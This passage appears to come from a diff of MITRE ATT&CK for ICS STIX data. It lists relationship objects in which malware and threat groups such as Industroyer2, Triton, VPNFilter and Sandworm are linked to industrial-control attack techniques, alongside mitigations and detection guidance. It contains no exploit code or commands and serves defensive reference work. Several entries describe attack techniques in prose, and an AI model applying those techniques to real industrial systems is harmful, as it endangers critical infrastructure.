"2023-03-30T19:25:41.475Z", + "revoked": false, + "external_references": [ + { + "source_name": "Industroyer2 Forescout July 2022", + "description": "Forescout. (2022, July 14). Industroyer2 and INCONTROLLER In-depth Technical Analysis of the Most Recent ICS-specific Malware. Retrieved March 30, 2023.", + "url": "https://www.forescout.com/resources/industroyer2-and-incontroller-report/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:25:41.475Z", + "description": "[Industroyer2](https://attack.mitre.org/software/S1072) uses a General Interrogation command to monitor the device’s Information Object Addresses (IOAs) and their IO state values.(Citation: Industroyer2 Forescout July 2022)", + "relationship_type": "uses", + "source_ref": "malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5", + "target_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--575f0e0b-d68d-432b-abb3-cbd3e641fc88", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.199Z", + "relationship_type": "mitigates", + "description": "Perform inline allowlisting of automation protocol commands to prevent devices from sending unauthorized command or reporting messages. Allow/denylist techniques need to be designed with sufficient accuracy to prevent the unintended blocking of valid reporting messages.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e852e64c-b5e0-4e7f-a189-bbc7aa7932c7", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.097Z", + "relationship_type": "mitigates", + "description": "Hot-standbys in diverse locations can ensure continued operations if the primarily system are compromised or unavailable. At the network layer, protocols such as the Parallel Redundancy Protocol can be used to simultaneously use redundant and diverse communication over a local network. (Citation: M. Rentschler and H. Heine)\n", + "source_ref": "course-of-action--f0f5c87a-a58d-440a-b3b5-ca679d98c6dd", + "target_ref": "attack-pattern--56ddc820-6cfb-407f-850b-52c035d123ac", + "external_references": [ + { + "source_name": "M. Rentschler and H. Heine", + "description": "M. Rentschler and H. Heine The Parallel Redundancy Protocol for industrial IP networks Retrieved. 2020/09/25 ", + "url": "https://ieeexplore.ieee.org/document/6505877" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--17ae41a5-cb45-4935-bec1-ea0c8bfb2f34", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.128Z", + "relationship_type": "mitigates", + "description": "This technique may not be effectively mitigated against, consider controls for assets and processes that lead to the use of this technique.\n", + "source_ref": "course-of-action--469b78dd-a54d-4f7c-8c3b-4a1dd916b433", + "target_ref": "attack-pattern--53a48c74-0025-45f4-b04a-baa853df8204", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--b48be9f9-de0e-4548-ade3-09d47af52798", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:03:58.153Z", + "description": "Monitor asset alarms which may help identify a loss of communications. Consider correlating alarms with other data sources that indicate traffic has been blocked, such as network traffic. In cases where alternative methods of communicating with outstations exist alarms may still be visible even if command messages are blocked.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e", + "target_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f664bf42-5fb2-41e5-b790-978ddf866da3", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T17:45:58.655Z", + "description": "Monitor for information collection on assets that may indicate deviations from standard operational tools. Examples include unexpected industrial automation protocol functions, new high volume communication sessions, or broad collection across many hosts within the network. ", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0d305450-d5ca-46fe-8583-36c983dd0a88", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:43:33.144Z", + "description": "Monitor ICS management protocols for functions that change an asset’s operating mode.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6ff846b1-9444-45f1-837a-4eeeb16bdfe7", + "created": "2023-03-30T19:25:22.673Z", + "revoked": false, + "external_references": [ + { + "source_name": "Industroyer2 Forescout July 2022", + "description": "Forescout. (2022, July 14). Industroyer2 and INCONTROLLER In-depth Technical Analysis of the Most Recent ICS-specific Malware. Retrieved March 30, 2023.", + "url": "https://www.forescout.com/resources/industroyer2-and-incontroller-report/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:25:22.673Z", + "description": "[Industroyer2](https://attack.mitre.org/software/S1072) leverages a hardcoded list of remote-station IP addresses to iteratively initiate communications and collect information across multiple priority IEC-104 priority levels.(Citation: Industroyer2 Forescout July 2022)", + "relationship_type": "uses", + "source_ref": "malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5", + "target_ref": "attack-pattern--3de230d4-3e42-4041-b089-17e1128feded", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0c284ce0-0be2-4164-b686-7c383b246aec", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ESET Research Whitepapers September 2018", + "description": "ESET Research Whitepapers 2018, September LOJAX First UEFI rootkit found in the wild, courtesy of the Sednit group Retrieved. 2020/09/25 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf" + }, + { + "source_name": "Intel", + "description": "Intel ESET Research Whitepapers 2018, September LOJAX First UEFI rootkit found in the wild, courtesy of the Sednit group Retrieved. 2020/09/25 Intel Hardware-based Security Technologies for Intelligent Retail Devices Retrieved. 2020/09/25 ", + "url": "https://www.intel.com/content/dam/www/public/us/en/documents/white-papers/security-technologies-4th-gen-core-retail-paper.pdf" + }, + { + "source_name": "N/A", + "description": "N/A Trusted Platform Module (TPM) Summary Retrieved. 2020/09/25 ", + "url": "https://www.trustedcomputinggroup.org/wp-content/uploads/Trusted-Platform-Module-Summary_04292008.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:19:56.151Z", + "description": "Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. Use Trusted Platform Module technology. (Citation: N/A) Move system's root of trust to hardware to prevent tampering with the SPI flash memory. (Citation: ESET Research Whitepapers September 2018) Technologies such as Intel Boot Guard can assist with this. (Citation: Intel)\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--8ac1d6e1-b07f-476a-9732-84984ebc2405", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--48489baf-56c2-423e-964a-0a61688e4a19", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.224Z", + "relationship_type": "mitigates", + "description": "Perform inline allowlisting of automation protocol commands to prevent devices from sending unauthorized command or reporting messages. Allow/denylist techniques need to be designed with sufficient accuracy to prevent the unintended blocking of valid messages.\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--95b12e1a-7f21-4fa0-9b2a-c96c7c270625", + "created": "2021-10-14T21:33:27.046Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos", + "description": "Dragos Electrum Retrieved. 2019/10/27 ", + "url": "https://dragos.com/resource/electrum/" + }, + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-07T17:01:17.079Z", + "description": "In the Ukraine 2015 Incident, [Sandworm Team](https://attack.mitre.org/groups/G0034) used the credentials of valid accounts to interact with client applications and access employee workstations hosting HMI applications. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)(Citation: Dragos)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--6f2c2043-6487-467a-bb49-e8cd2509ae9f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.112Z", + "relationship_type": "mitigates", + "description": "Regularly scan externally facing systems for vulnerabilities and establish procedures to rapidly patch systems when critical vulnerabilities are discovered through scanning and public disclosure.\n", + "source_ref": "course-of-action--97f33c84-8508-45b9-8a1d-cac921828c9e", + "target_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--350814da-5c36-42f9-8e58-8f9534e6ce0a", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "FireEye TRITON", + "description": "Blake Johnson, Dan Caban, Marina Krotofil, Dan Scali, Nathan Brubaker, Christopher Glyer. (2017, December 14). Attackers Deploy New ICS Attack Framework \"TRITON\" and Cause Operational Disruption to Critical Infrastructure. Retrieved January 6, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html" + }, + { + "source_name": "DHS CISA February 2019", + "description": "DHS CISA 2019, February 27 MAR-17-352-01 HatManSafety System Targeted Malware (Update B) Retrieved. 2019/03/08 ", + "url": "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20B%29.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-29T20:49:30.525Z", + "description": "[Triton](https://attack.mitre.org/software/S1009)'s injector, inject.bin, masquerades as a standard compiled PowerPC program for the Tricon. (Citation: DHS CISA February 2019)\n\n[Triton](https://attack.mitre.org/software/S1009) was configured to masquerade as trilog.exe, which is the Triconex software for analyzing SIS logs.(Citation: FireEye TRITON)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--ba203963-3182-41ac-af14-7e7ebc83cd61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--54e73627-95de-4e6e-abf0-d93e20a1fe8f", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T17:07:49.346Z", + "description": "Monitor for device alarms produced when program uploads occur, although not all devices will produce such alarms.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e09e253c-fd28-49ae-988e-1f80d769e8b8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.227Z", + "relationship_type": "mitigates", + "description": "Prevent the use of unsigned executables, such as installers and scripts.\n", + "source_ref": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--71c81024-ea36-4853-940a-cd9d4cbcabed", + "created": "2021-04-11T14:06:54.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Dragos December 2017", + "description": "Dragos 2017, December 13 TRISIS Malware Analysis of Safety System Targeted Malware Retrieved. 2018/01/12 ", + "url": "https://dragos.com/blog/trisis/TRISIS-01.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:05:39.957Z", + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) utilized remote desktop protocol (RDP) jump boxes to move into the ICS environment. (Citation: Dragos December 2017)", + "relationship_type": "uses", + "source_ref": "intrusion-set--9538b1a4-4120-4e2d-bf59-3b11fcab05a4", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--cb30d507-edc6-4197-947c-7b3a6e395c0d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.178Z", + "relationship_type": "mitigates", + "description": "Utilize code signatures to verify the integrity of the installed program on safety or control assets has not been changed.\n", + "source_ref": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--3f5f9f9d-9bb3-4461-b85b-501f6077e7b8", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:40:51.224Z", + "description": "Monitor executed commands and arguments that may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e5afc447-a241-4773-9a8a-3d6fd205d926", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.106Z", + "relationship_type": "mitigates", + "description": "Utilize exploit protection to prevent activities which may be exploited through malicious web sites.\n", + "source_ref": "course-of-action--49363b74-d506-4342-bd63-320586ebadb9", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--6acf3236-d7e6-416c-90e5-5cf6bd89e01d", + "created": "2023-03-30T14:09:40.255Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T14:09:40.255Z", + "description": "Monitor for device alarms produced when device management passwords are changed, although not all devices will produce such alarms.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9d56be63-3501-4dd3-bb5f-63c580833298", + "target_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--79fccaf1-3592-4af0-8a47-1d325b9fd5a4", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:46:05.831Z", + "description": "Monitor for newly constructed web-based network connections that are sent to malicious or suspicious destinations (e.g., destinations attributed to phishing campaigns). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments (e.g., monitor anomalies in use of files that do not normally initiate network connections or unusual connections initiated by regsvr32.exe, rundll.exe, SCF, HTA, MSI, DLLs, or msiexec.exe). ", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--181a9f8c-c780-4f1f-91a8-edb770e904ba", + "target_ref": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--d8f45959-e0fc-4b4f-a074-a3acea926300", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.194Z", + "relationship_type": "mitigates", + "description": "Consider the disabling of features such as AutoRun.\n", + "source_ref": "course-of-action--d0909119-2f71-4923-87db-b649881672d7", + "target_ref": "attack-pattern--c267bbee-bb59-47fe-85e0-3ed210337c21", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--98f1d575-a975-42ae-8b00-2c9e22d560d5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.127Z", + "relationship_type": "mitigates", + "description": "Set and enforce secure password policies for accounts.\n", + "source_ref": "course-of-action--5d97c693-e054-48ba-a3a3-eaf6942dfb65", + "target_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--2e0769d7-088e-45d5-a262-6dbc91a95073", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:51:31.992Z", + "description": "Monitor for files (such as /etc/hosts) being accessed that may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--235b7491-2d2b-4617-9a52-3c0783680f71", + "target_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--46332a77-2fd6-4033-96cf-6163172775ec", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.164Z", + "relationship_type": "mitigates", + "description": "Devices should verify that firmware has been properly signed by the vendor before allowing installation.\n", + "source_ref": "course-of-action--71eb7dad-07eb-4bbc-9df0-ac57bf2fba4a", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--cad91f87-7cc7-4771-8c7b-1599793ed3c1", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Carl Hurd March 2019", + "description": "Carl Hurd 2019, March 26 VPNFilter Deep Dive Retrieved. 2019/03/28 ", + "url": "https://www.youtube.com/watch?v=yuZazP22rpI" + }, + { + "source_name": "William Largent June 2018", + "description": "William Largent 2018, June 06 VPNFilter Update - VPNFilter exploits endpoints, targets new devices Retrieved. 2019/03/28 ", + "url": "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:31:19.732Z", + "description": "The [VPNFilter](https://attack.mitre.org/software/S1010) packet sniffer looks for basic authentication as well as monitors ICS traffic, and is specific to the TP-LINK R600-VPN. The malware uses a raw socket to look for connections to a pre-specified IP address, only looking at TCP packets that are 150 bytes or larger. Packets that are not on port 502, are scanned for BasicAuth, and that information is logged. This may have allowed credential harvesting from communications between devices accessing a modbus-enabled HMI. (Citation: William Largent June 2018) (Citation: Carl Hurd March 2019)", + "relationship_type": "uses", + "source_ref": "malware--6108f800-10b8-4090-944e-be579f01263d", + "target_ref": "attack-pattern--38213338-1aab-479d-949b-c81b66ccca5c", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--193c3cd3-0b22-4839-a1fa-413aee61e882", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:30:40.378Z", + "description": "Monitor log files for process execution through command-line and scripting activities. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8a07f92e-9384-4967-9cd9-ffa08a0e55bf", + "created": "2023-03-30T19:01:40.038Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:01:40.038Z", + "description": "Monitor for any suspicious attempts to enable scripts running on a system. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": 